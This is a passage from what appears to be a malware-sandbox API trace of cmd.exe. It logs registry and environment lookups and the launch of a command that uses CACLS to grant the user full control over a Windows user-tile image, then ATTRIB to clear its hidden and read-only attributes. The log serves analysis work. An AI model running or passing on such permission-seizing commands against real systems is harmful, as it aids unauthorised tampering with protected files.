dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0183.954] GetConsoleOutputCP () returned 0x1b5 [0183.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.955] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0183.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0183.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.955] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.955] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0183.955] GetEnvironmentStringsW () returned 0x90308* [0183.956] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0183.956] GetEnvironmentStringsW () returned 0x90308* [0183.956] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0183.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced6c | out: phkResult=0x2ced6c*=0x40) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0xb8, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x0, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegCloseKey (hKey=0x40) returned 0x0 [0183.956] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced6c | out: phkResult=0x2ced6c*=0x40) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x0, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x9, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x9, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x9, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegCloseKey (hKey=0x40) returned 0x0 [0183.956] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886392 [0183.956] srand (_Seed=0x5b886392) [0183.956] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" [0183.957] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" [0183.957] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.957] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0183.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.957] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.957] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.957] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0183.957] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.957] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0183.957] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0183.957] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.957] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.957] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.957] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.957] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.957] GetEnvironmentStringsW () returned 0x92458* [0183.958] FreeEnvironmentStringsW (penv=0x92458) returned 1 [0183.958] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.958] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.958] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.958] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.958] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.958] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.958] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.958] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.958] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.958] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfb38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfb38, lpFilePart=0x2cfb34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfb34*="Desktop") returned 0x18 [0183.958] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.958] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf8b4 | out: lpFindFileData=0x2cf8b4) returned 0x90ae8 [0183.958] FindClose (in: hFindFile=0x90ae8 | out: hFindFile=0x90ae8) returned 1 [0183.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf8b4 | out: lpFindFileData=0x2cf8b4) returned 0x90ae8 [0183.958] FindClose (in: hFindFile=0x90ae8 | out: hFindFile=0x90ae8) returned 1 [0183.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf8b4 | out: lpFindFileData=0x2cf8b4) returned 0x90ae8 [0183.958] FindClose (in: hFindFile=0x90ae8 | out: hFindFile=0x90ae8) returned 1 [0183.959] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.959] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0183.959] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0183.959] GetEnvironmentStringsW () returned 0x90308* [0183.959] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0183.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.959] GetConsoleOutputCP () returned 0x1b5 [0183.959] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.959] GetUserDefaultLCID () returned 0x409 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfc78, cchData=128 | out: lpLCData="0") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfc78, cchData=128 | out: lpLCData="0") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfc78, cchData=128 | out: lpLCData="1") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0183.960] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0183.960] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0183.961] GetConsoleTitleW (in: lpConsoleTitle=0x809b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.961] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0183.961] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0183.961] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0183.962] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0183.962] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0183.962] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0183.962] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0183.963] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0183.963] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0183.963] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0183.963] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0183.965] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0183.965] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0183.965] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0183.965] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0183.965] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0183.965] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0183.965] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0183.967] GetConsoleTitleW (in: lpConsoleTitle=0x2cf90c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.968] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.968] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.968] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.968] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.968] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.968] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.968] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.968] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.968] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.968] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.968] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.968] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.968] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.968] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.968] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.968] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.968] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.968] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.968] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.968] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.968] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.968] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.968] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.968] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.968] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.968] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.969] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.969] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.969] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.969] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.969] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.969] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.969] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.969] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.969] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.969] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.969] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.969] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.969] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.969] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.969] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.969] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.969] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.969] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.969] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.969] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.969] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.969] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.969] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0183.969] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0183.969] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0183.970] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0183.970] SetErrorMode (uMode=0x0) returned 0x0 [0183.970] SetErrorMode (uMode=0x1) returned 0x0 [0183.970] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x91e98, lpFilePart=0x2cf42c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf42c*="Desktop") returned 0x18 [0183.970] SetErrorMode (uMode=0x0) returned 0x1 [0183.970] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.970] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.975] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0183.976] GetLastError () returned 0x2 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0183.976] GetLastError () returned 0x2 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x92180 [0183.976] FindClose (in: hFindFile=0x92180 | out: hFindFile=0x92180) returned 1 [0183.976] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0xffffffff [0183.977] GetLastError () returned 0x2 [0183.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf1a8) returned 0x92180 [0183.977] FindClose (in: hFindFile=0x92180 | out: hFindFile=0x92180) returned 1 [0183.977] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.977] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.977] GetConsoleTitleW (in: lpConsoleTitle=0x2cf6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.074] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf528, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf5f0 | out: lpAttributeList=0x2cf528, lpSize=0x2cf5f0) returned 1 [0184.074] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf528, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf5e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf528, lpPreviousValue=0x0) returned 1 [0184.074] GetStartupInfoW (in: lpStartupInfo=0x2cf4e4 | out: lpStartupInfo=0x2cf4e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.074] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.075] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf584*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf5d0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2cf5d0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcec, dwThreadId=0xd4c)) returned 1 [0184.078] CloseHandle (hObject=0x4c) returned 1 [0184.078] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.078] GetEnvironmentStringsW () returned 0x90308* [0184.078] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0184.079] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0184.278] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf4c4 | out: lpExitCode=0x2cf4c4*=0x0) returned 1 [0184.278] CloseHandle (hObject=0x50) returned 1 [0184.278] _vsnwprintf (in: _Buffer=0x2cf60c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf4d0 | out: _Buffer="00000000") returned 8 [0184.278] SetEnvironmentVariableW 